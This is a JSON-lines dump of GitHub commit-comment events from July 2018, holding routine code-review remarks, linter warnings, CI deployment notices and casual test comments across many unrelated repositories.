{"id":"8014509898","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824630,"position":30,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:50Z","updated_at":"2018-07-25T06:49:50Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:50Z"}
{"id":"8014509914","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824631,"position":34,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:50Z","updated_at":"2018-07-25T06:49:50Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:50Z"}
{"id":"8014509918","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824632,"position":54,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:50Z","updated_at":"2018-07-25T06:49:50Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:50Z"}
{"id":"8014509928","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824633,"position":58,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:50Z","updated_at":"2018-07-25T06:49:50Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:50Z"}
{"id":"8014509955","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824634,"position":62,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:51Z","updated_at":"2018-07-25T06:49:51Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:51Z"}
{"id":"8014509970","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824635,"position":66,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:51Z","updated_at":"2018-07-25T06:49:51Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:51Z"}
{"id":"8014510416","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_kernel_samsung_exynos7580-common"},"payload":{"comment":{"id":29824636,"position":null,"line":null,"path":null,"commit_id":"83e2e8199f08bc4fb0cd9cb7d000680524a4bbde","created_at":"2018-07-25T06:49:57Z","updated_at":"2018-07-25T06:49:57Z","author_association":"NONE","body":"OK!\r\nGood luck!"}},"created_at":"2018-07-25T06:49:57Z"}
{"id":"8014511629","type":"CommitCommentEvent","actor":{"login":"samsson"},"repo":{"name":"Neo23x0/sigma"},"payload":{"comment":{"id":29824637,"position":null,"line":null,"path":null,"commit_id":"cf7f5c747341bcaa9f49d7b4fd844c0e4787743c","created_at":"2018-07-25T06:50:15Z","updated_at":"2018-07-25T06:50:15Z","author_association":"CONTRIBUTOR","body":"Hi Florian,\r\n\r\nThanks! This is exactly what I was looking for.\r\nI have tested this in prod environment for about three months with just one false positive related to a zone identifier.\r\nAlthough in that rule I was looking for file modifications to filenames with colon in them, I did not figure out what sigma friendly logs I could use for that.\r\nI think the ”stream” string has a leading dash in it, I will check and update.\r\nI will test this particular rule and see what comes but I am quite certain there are very few false positives (always depends on environment though)."}},"created_at":"2018-07-25T06:50:15Z"}
{"id":"8014512145","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824638,"position":8,"line":15,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T06:50:24Z","updated_at":"2018-07-25T06:50:24Z","author_association":"MEMBER","body":"remove/delete all unused code; don't need to comment out like this "}},"created_at":"2018-07-25T06:50:24Z"}
{"id":"8014514265","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29824642,"position":null,"line":null,"path":null,"commit_id":"c5e114ab1ad17816665ddc3e22afb2a41c68144a","created_at":"2018-07-25T06:50:58Z","updated_at":"2018-07-25T06:50:58Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-25T06:50:58Z"}
{"id":"8014517281","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824646,"position":76,"line":56,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T06:51:44Z","updated_at":"2018-07-25T06:51:44Z","author_association":"MEMBER","body":"all events should be in CapitalCase \r\n\r\n`changePercentSuccess` -> `ChangePercentSuccess`"}},"created_at":"2018-07-25T06:51:44Z"}
{"id":"8014517538","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29824648,"position":null,"line":null,"path":null,"commit_id":"beeb451b6997342e34909ca5d714b1da69b88220","created_at":"2018-07-25T06:51:48Z","updated_at":"2018-07-25T06:51:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-930](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-930).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-930-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T06:51:48Z"}
{"id":"8014518732","type":"CommitCommentEvent","actor":{"login":"zhengkaifor"},"repo":{"name":"zhengkaifor/myRepository"},"payload":{"comment":{"id":29824651,"position":null,"line":null,"path":null,"commit_id":"69902b927e9b9369f03a3d8890bc7d419464a812","created_at":"2018-07-25T06:52:07Z","updated_at":"2018-07-25T06:52:07Z","author_association":"OWNER","body":"1.游标声明应在变量声明之后,并且应该在循环外部全部声明完成.\r\n2.句柄声明再游标之后且只能声明一个句柄."}},"created_at":"2018-07-25T06:52:07Z"}
{"id":"8014522718","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824659,"position":112,"line":78,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T06:53:09Z","updated_at":"2018-07-25T06:53:09Z","author_association":"MEMBER","body":"Should add space like this for all code\r\n\r\n`FIXED_PERCENT=_percent;` -> `FIXED_PERCENT = _percent;`"}},"created_at":"2018-07-25T06:53:09Z"}
{"id":"8014525997","type":"CommitCommentEvent","actor":{"login":"bakape"},"repo":{"name":"bakape/thumbnailer"},"payload":{"comment":{"id":29824663,"position":null,"line":null,"path":null,"commit_id":"374fd7d8103f7c0c4e384f92a4531950944c6752","created_at":"2018-07-25T06:53:59Z","updated_at":"2018-07-25T06:53:59Z","author_association":"OWNER","body":"@Kagami \r\nYou might want to look into the recent patches. There are some crash fixes and performance improvements. "}},"created_at":"2018-07-25T06:53:59Z"}
{"id":"8014528482","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29824666,"position":null,"line":null,"path":null,"commit_id":"248e527dedca0b0920374134d97bcaf13c98fef8","created_at":"2018-07-25T06:54:36Z","updated_at":"2018-07-25T06:54:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-932](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-932).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-932-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T06:54:36Z"}
{"id":"8014530867","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824670,"position":120,"line":85,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T06:55:12Z","updated_at":"2018-07-25T06:55:12Z","author_association":"MEMBER","body":"owner should not withdraw the fixed amount"}},"created_at":"2018-07-25T06:55:12Z"}
{"id":"8014533024","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"nmap/nmap"},"payload":{"comment":{"id":29824672,"position":null,"line":null,"path":null,"commit_id":"f31ef12ca36016018b7d96a4026759d98cfbcc3c","created_at":"2018-07-25T06:55:46Z","updated_at":"2018-07-25T06:55:46Z","author_association":"NONE","body":"On the above line 572, there is a *typo*. MSVC says:\r\n```\r\nncat_exec_win.c(572): error C2065: 'fdn': undeclared identifier\r\nncat_exec_win.c(572): error C2227: left of '->ssl' must point to class/struct/union/generic type\r\nncat_exec_win.c(572): note: type is 'unknown-type'\r\n...\r\n```\r\nShouldn't it be:\r\n```diff\r\n--- a/ncat_exec_win.c 2018-07-23 10:43:37\r\n+++ b/ncat_exec_win.c 2018-07-25 06:48:07\r\n@@ -569,9 +569,9 @@\r\n loop_end:\r\n\r\n #ifdef HAVE_OPENSSL\r\n-    if (o.ssl && fdn->ssl) {\r\n-        SSL_shutdown(fdn->ssl);\r\n-        SSL_free(fdn->ssl);\r\n+    if (o.ssl && info->fdn.ssl) {\r\n+        SSL_shutdown(info->fdn.ssl);\r\n+        SSL_free(info->fdn.ssl);\r\n     }\r\n #endif\r\n```\r\n"}},"created_at":"2018-07-25T06:55:46Z"}
{"id":"8014536719","type":"CommitCommentEvent","actor":{"login":"jma"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824674,"position":66,"line":23,"path":"invenio_circulation/config.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T06:56:38Z","updated_at":"2018-07-25T06:56:38Z","author_association":"NONE","body":"Why a dictionary as the key is always equal to the `src` parameter?"}},"created_at":"2018-07-25T06:56:38Z"}
{"id":"8014536877","type":"CommitCommentEvent","actor":{"login":"youngerzeng"},"repo":{"name":"youngerzeng/helloworld"},"payload":{"comment":{"id":29824676,"position":1,"line":1,"path":"README.md","commit_id":"86fa3a3e3d109d01a786d6733c10101286977344","created_at":"2018-07-25T06:56:41Z","updated_at":"2018-07-25T06:56:41Z","author_association":"OWNER","body":"这是一个评论"}},"created_at":"2018-07-25T06:56:41Z"}
{"id":"8014537084","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29824677,"position":null,"line":null,"path":null,"commit_id":"700b5ecaee84a273c80881d0967c2f203fb5e508","created_at":"2018-07-25T06:56:44Z","updated_at":"2018-07-25T06:56:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-154](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-154).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-154-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T06:56:44Z"}
{"id":"8014537923","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"sohail/csv"},"payload":{"comment":{"id":29824681,"position":10,"line":9,"path":"CSV/parser.hh","commit_id":"9ba7c2a7d7ebbdb379ac12f395c3c2229661166c","created_at":"2018-07-25T06:56:58Z","updated_at":"2018-07-25T06:56:58Z","author_association":"NONE","body":"The previous identifier looked better than the adjusted one at this source code place.\r\nWere more [underscores](https://stackoverflow.com/questions/228783/what-are-the-rules-about-using-an-underscore-in-a-c-identifier#answer-228797 \"What are the rules about using an underscore in a C++ identifier?\") deleted than for fixing a specific issue?"}},"created_at":"2018-07-25T06:56:58Z"}
{"id":"8014538968","type":"CommitCommentEvent","actor":{"login":"HannahVMeyer"},"repo":{"name":"HannahVMeyer/limmbo"},"payload":{"comment":{"id":29824683,"position":null,"line":null,"path":null,"commit_id":"a65bbe55ce3c6a48bf9cc794a8ddab863b41d922","created_at":"2018-07-25T06:57:14Z","updated_at":"2018-07-25T06:57:14Z","author_association":"OWNER","body":"This looks great, thank you! Will merge with branch master now."}},"created_at":"2018-07-25T06:57:14Z"}
{"id":"8014540618","type":"CommitCommentEvent","actor":{"login":"joefitzgerald"},"repo":{"name":"onsi/gomega"},"payload":{"comment":{"id":29824686,"position":null,"line":null,"path":null,"commit_id":"4bb581de2267ae3b1171b4c084ab7055fb5530fb","created_at":"2018-07-25T06:57:38Z","updated_at":"2018-07-25T06:57:38Z","author_association":"NONE","body":"Turns out I was misled by the fact that `go vet` was being run in the `script`; I didn't see it hanging out on the end of the line. All that was required to fix things was an additional `env GO111MODULE=on`. Sorry for all the noise on this!"}},"created_at":"2018-07-25T06:57:38Z"}
{"id":"8014544344","type":"CommitCommentEvent","actor":{"login":"jma"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824693,"position":68,"line":25,"path":"invenio_circulation/config.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T06:58:37Z","updated_at":"2018-07-25T06:58:37Z","author_association":"NONE","body":"The action should explicit, it should defined as parameter else it is difficult to know which actions are available."}},"created_at":"2018-07-25T06:58:37Z"}
{"id":"8014545112","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"sohail/csv"},"payload":{"comment":{"id":29824697,"position":4,"line":6,"path":"functions/main.cc","commit_id":"9ba7c2a7d7ebbdb379ac12f395c3c2229661166c","created_at":"2018-07-25T06:58:50Z","updated_at":"2018-07-25T06:58:50Z","author_association":"NONE","body":"I find that such a change does not fit to the commit subject."}},"created_at":"2018-07-25T06:58:50Z"}
{"id":"8014547500","type":"CommitCommentEvent","actor":{"login":"trevor211"},"repo":{"name":"antirez/redis"},"payload":{"comment":{"id":29824701,"position":null,"line":null,"path":null,"commit_id":"53d46fa712619af7bcd7883aabe279344336be11","created_at":"2018-07-25T06:59:26Z","updated_at":"2018-07-25T06:59:26Z","author_association":"CONTRIBUTOR","body":"I can't agree more."}},"created_at":"2018-07-25T06:59:26Z"}
{"id":"8014549257","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"xnBal/pcap_test"},"payload":{"comment":{"id":29824703,"position":98,"line":98,"path":"main.cpp","commit_id":"dd3fd0b8e1d941b62ccb2f3896622ffff2544a1d","created_at":"2018-07-25T06:59:53Z","updated_at":"2018-07-25T06:59:53Z","author_association":"NONE","body":"Ethernet Header위에 IP Header가 오는지 확인할 것."}},"created_at":"2018-07-25T06:59:53Z"}
{"id":"8014549276","type":"CommitCommentEvent","actor":{"login":"jlandersen"},"repo":{"name":"SOHU-Co/kafka-node"},"payload":{"comment":{"id":29824704,"position":55,"line":281,"path":"lib/kafkaClient.js","commit_id":"a3653ba2d75a180be1e35f25be66cae0c9dcaa1c","created_at":"2018-07-25T06:59:54Z","updated_at":"2018-07-25T06:59:54Z","author_association":"CONTRIBUTOR","body":"Makes sense - let me add a PR as soon as possible to pass along the parameter to getBrokers."}},"created_at":"2018-07-25T06:59:54Z"}
{"id":"8014550005","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"xnBal/pcap_test"},"payload":{"comment":{"id":29824709,"position":107,"line":107,"path":"main.cpp","commit_id":"dd3fd0b8e1d941b62ccb2f3896622ffff2544a1d","created_at":"2018-07-25T07:00:06Z","updated_at":"2018-07-25T07:00:06Z","author_association":"NONE","body":"IP Header위에 TCP Header가 오는지 확인할 것."}},"created_at":"2018-07-25T07:00:06Z"}
{"id":"8014551862","type":"CommitCommentEvent","actor":{"login":"vitthaljadhav"},"repo":{"name":"vitthaljadhav/Look-up-Method"},"payload":{"comment":{"id":29824718,"position":null,"line":null,"path":null,"commit_id":"3fe1c486efe5c4a19be68fb7c491b660831f56b2","created_at":"2018-07-25T07:00:32Z","updated_at":"2018-07-25T07:00:32Z","author_association":"OWNER","body":"package bean;\r\npublic interface Car\r\n{\r\n\tabstract public Engine myCarEngine();\r\nabstract void recentAdd();\r\n} "}},"created_at":"2018-07-25T07:00:32Z"}
{"id":"8014551981","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29824719,"position":null,"line":null,"path":null,"commit_id":"c0d01b8633985a17f849cbfa5fb74bdc9d903aa8","created_at":"2018-07-25T07:00:33Z","updated_at":"2018-07-25T07:00:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T07:00:33Z"}
{"id":"8014552679","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"xnBal/pcap_test"},"payload":{"comment":{"id":29824721,"position":145,"line":145,"path":"main.cpp","commit_id":"dd3fd0b8e1d941b62ccb2f3896622ffff2544a1d","created_at":"2018-07-25T07:00:44Z","updated_at":"2018-07-25T07:00:44Z","author_association":"NONE","body":"TCP Data가 존재하는 경우 최대 16바이트만 출력(hexadecimal 형식)할 것."}},"created_at":"2018-07-25T07:00:44Z"}
{"id":"8014553897","type":"CommitCommentEvent","actor":{"login":"Shadowss"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29824724,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-25T07:01:02Z","updated_at":"2018-07-25T07:01:02Z","author_association":"OWNER","body":"Hmm on the test server PHP version is 7.0 and if i press return to natars appear village with name Natar villages 106"}},"created_at":"2018-07-25T07:01:02Z"}
{"id":"8014554124","type":"CommitCommentEvent","actor":{"login":"youngerzeng"},"repo":{"name":"youngerzeng/helloworld"},"payload":{"comment":{"id":29824725,"position":1,"line":1,"path":"README.md","commit_id":"86fa3a3e3d109d01a786d6733c10101286977344","created_at":"2018-07-25T07:01:06Z","updated_at":"2018-07-25T07:01:06Z","author_association":"OWNER","body":" **_这是第二个评论_**\r\n\r\n>  哈哈哈\r\n` 这是一个代码行`\r\n[这是一个链接](http://baidu.com)\r\n- haha\r\n\r\n1. hahaha "}},"created_at":"2018-07-25T07:01:06Z"}
{"id":"8014555191","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824727,"position":371,"line":241,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T07:01:22Z","updated_at":"2018-07-25T07:01:22Z","author_association":"MEMBER","body":"how can you ensure that the smart contract have enough balance for member to withdraw?"}},"created_at":"2018-07-25T07:01:22Z"}
{"id":"8014556873","type":"CommitCommentEvent","actor":{"login":"youngerzeng"},"repo":{"name":"youngerzeng/helloworld"},"payload":{"comment":{"id":29824732,"position":null,"line":null,"path":null,"commit_id":"86fa3a3e3d109d01a786d6733c10101286977344","created_at":"2018-07-25T07:01:48Z","updated_at":"2018-07-25T07:01:48Z","author_association":"OWNER","body":"这又是一个评论"}},"created_at":"2018-07-25T07:01:48Z"}
{"id":"8014557103","type":"CommitCommentEvent","actor":{"login":"atm-john"},"repo":{"name":"Dolibarr/dolibarr"},"payload":{"comment":{"id":29824734,"position":null,"line":null,"path":null,"commit_id":"869a97c8d1942a8b570db4225e881af6fc2f96e3","created_at":"2018-07-25T07:01:52Z","updated_at":"2018-07-25T07:01:52Z","author_association":"CONTRIBUTOR","body":"good :-)"}},"created_at":"2018-07-25T07:01:52Z"}
{"id":"8014558186","type":"CommitCommentEvent","actor":{"login":"wingskyo1"},"repo":{"name":"wingskyo1/test3"},"payload":{"comment":{"id":29824737,"position":null,"line":null,"path":null,"commit_id":"3952d642334ab42797e6e87f8226b0ecd9e56de5","created_at":"2018-07-25T07:02:09Z","updated_at":"2018-07-25T07:02:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [1111](https://trello.com/c/iP50Ng0A/13-1111)"}},"created_at":"2018-07-25T07:02:09Z"}
{"id":"8014565752","type":"CommitCommentEvent","actor":{"login":"romanbetik"},"repo":{"name":"romanbetik/RomanBetik.HomeOrganizer"},"payload":{"comment":{"id":29824749,"position":null,"line":null,"path":null,"commit_id":"195bb69ce9d85b8a48023dc5caaf426c094ab51b","created_at":"2018-07-25T07:04:03Z","updated_at":"2018-07-25T07:04:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [API for salary](https://trello.com/c/oO1aYiLW/14-api-for-salary)"}},"created_at":"2018-07-25T07:04:03Z"}
{"id":"8014566658","type":"CommitCommentEvent","actor":{"login":"qinclq"},"repo":{"name":"qinclq/qinclq.github.io"},"payload":{"comment":{"id":29824753,"position":null,"line":null,"path":null,"commit_id":"2d1a75464d184a911746414dc3df9f619dd379fd","created_at":"2018-07-25T07:04:15Z","updated_at":"2018-07-25T07:04:15Z","author_association":"OWNER","body":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\ndata = pd.read_csv(\"D://kaggle//adata//train.csv\")\r\ndata.info()\r\ndata.describe()\r\n\r\nfig, ax = plt.subplots()\r\nax.scatter(x = data['GrLivArea'], y=data['SalePrice'])\r\nplt.xlabel('GrLivArea', fontsize = 13)\r\nplt.ylabel('SalePrice', fontsize = 13)\r\nplt.show()"}},"created_at":"2018-07-25T07:04:15Z"}
{"id":"8014567253","type":"CommitCommentEvent","actor":{"login":"Kurniawan888"},"repo":{"name":"CodingDoug/firebase-jetpack"},"payload":{"comment":{"id":29824754,"position":null,"line":null,"path":null,"commit_id":"76e14755bb4c73d834495d89d0239a9c15c7b78c","created_at":"2018-07-25T07:04:25Z","updated_at":"2018-07-25T07:04:25Z","author_association":"NONE","body":"On 76e1475"}},"created_at":"2018-07-25T07:04:25Z"}
{"id":"8014567579","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/inpsyde-google-tag-manager"},"payload":{"comment":{"id":29824755,"position":10,"line":10,"path":"src/App/Provider.php","commit_id":"344e6d5da3a6a59acd02b875fa2ccc6654211070","created_at":"2018-07-25T07:04:30Z","updated_at":"2018-07-25T07:04:30Z","author_association":"MEMBER","body":"was fixed in next commit. :)"}},"created_at":"2018-07-25T07:04:30Z"}
{"id":"8014569971","type":"CommitCommentEvent","actor":{"login":"hferreiro"},"repo":{"name":"brave/muon"},"payload":{"comment":{"id":29824762,"position":14,"line":1370,"path":"patches/master_patch.patch","commit_id":"3e3d703a710f6c9cb8b6636ab4a4e898ae5f0ef7","created_at":"2018-07-25T07:05:05Z","updated_at":"2018-07-25T07:05:05Z","author_association":"COLLABORATOR","body":"In `C68`, all calls to `BravePasswordManagerClient::PromptUserToSaveOrUpdatePassword()` pass a `PasswordFormManager`.  I just thought it made more sense to catch future updates in which this isn't the case."}},"created_at":"2018-07-25T07:05:05Z"}
{"id":"8014571017","type":"CommitCommentEvent","actor":{"login":"amjadkhan1995"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29824764,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T07:05:19Z","updated_at":"2018-07-25T07:05:19Z","author_association":"NONE","body":"I looked at it but I didn’t understand very well how to use it, just give me the key to go on it plz💔"}},"created_at":"2018-07-25T07:05:19Z"}
{"id":"8014571542","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/inpsyde-google-tag-manager"},"payload":{"comment":{"id":29824766,"position":11,"line":8,"path":"inpsyde-google-tag-manager.php","commit_id":"344e6d5da3a6a59acd02b875fa2ccc6654211070","created_at":"2018-07-25T07:05:27Z","updated_at":"2018-07-25T07:05:27Z","author_association":"MEMBER","body":"yep, seems autoformatting breaks the header..dunno why 🤔 "}},"created_at":"2018-07-25T07:05:27Z"}
{"id":"8014574693","type":"CommitCommentEvent","actor":{"login":"dedmen"},"repo":{"name":"MidnightGH/Text-Adventure"},"payload":{"comment":{"id":29824774,"position":15,"line":15,"path":"TxtAdv/TxtAdv/ActionSource.cpp","commit_id":"06a58b18ea8f3b6e3536bef39ddd25cb63476acb","created_at":"2018-07-25T07:06:14Z","updated_at":"2018-07-25T07:06:14Z","author_association":"NONE","body":"What is this indentation?"}},"created_at":"2018-07-25T07:06:14Z"}
{"id":"8014579311","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29824787,"position":null,"line":null,"path":null,"commit_id":"c5e114ab1ad17816665ddc3e22afb2a41c68144a","created_at":"2018-07-25T07:07:20Z","updated_at":"2018-07-25T07:07:20Z","author_association":"NONE","body":"Congrats too!\r\nI would add some spaces to the code, correct identation and reformulate the depth condition more robust (consider the case someone simple test depth < 5. Then it would be ackward that the stat score check is only done for depth 3:\r\n```\r\nif (    lmrDepth < 4\r\n    && (lmrDepth < 3 || ((ss - 1)->statScore > 0 && !PvNode))\r\n\r\n```"}},"created_at":"2018-07-25T07:07:20Z"}
{"id":"8014579504","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824788,"position":219,"line":134,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T07:07:23Z","updated_at":"2018-07-25T07:07:23Z","author_association":"MEMBER","body":"event name should be relevant with function name ;)\r\n\r\n"}},"created_at":"2018-07-25T07:07:23Z"}
{"id":"8014580237","type":"CommitCommentEvent","actor":{"login":"sunitsingh1"},"repo":{"name":"sunitsingh1/loginapp1"},"payload":{"comment":{"id":29824790,"position":null,"line":null,"path":null,"commit_id":"d69d142515c5d4a4b2d4862b30523ba2268b0b72","created_at":"2018-07-25T07:07:34Z","updated_at":"2018-07-25T07:07:34Z","author_association":"OWNER","body":"hiii"}},"created_at":"2018-07-25T07:07:34Z"}
{"id":"8014580766","type":"CommitCommentEvent","actor":{"login":"fangshuweiok"},"repo":{"name":"fangshuweiok/demoSSM01"},"payload":{"comment":{"id":29824792,"position":null,"line":null,"path":null,"commit_id":"ecaf4d85ce6e1c2353e0307c7b61acc23b2e3ea2","created_at":"2018-07-25T07:07:42Z","updated_at":"2018-07-25T07:07:42Z","author_association":"OWNER","body":"你看看如何1"}},"created_at":"2018-07-25T07:07:42Z"}
{"id":"8014581121","type":"CommitCommentEvent","actor":{"login":"dedmen"},"repo":{"name":"MidnightGH/Text-Adventure"},"payload":{"comment":{"id":29824793,"position":28,"line":28,"path":"TxtAdv/TxtAdv/ActionSource.cpp","commit_id":"06a58b18ea8f3b6e3536bef39ddd25cb63476acb","created_at":"2018-07-25T07:07:47Z","updated_at":"2018-07-25T07:07:47Z","author_association":"NONE","body":"You are copying every string you get everytime. Even though you only read it. No need to grab a copy.\r\npass `const std::string&` instead of `std::string`. The `&` passes a reference and thus doesn't copy it. And the `const` makes sure no one inside that function edits it. In the end you have the same behaviour as a copy as in the string you pass in will not change when you come back out."}},"created_at":"2018-07-25T07:07:47Z"}
{"id":"8014582047","type":"CommitCommentEvent","actor":{"login":"LiatAqua"},"repo":{"name":"LiatAqua/MyFamily"},"payload":{"comment":{"id":29824795,"position":null,"line":null,"path":null,"commit_id":"6242ae4a3b5a8fc73c3ff7fb7ca74f136b4c8a52","created_at":"2018-07-25T07:07:59Z","updated_at":"2018-07-25T07:07:59Z","author_association":"OWNER","body":"deleted"}},"created_at":"2018-07-25T07:07:59Z"}
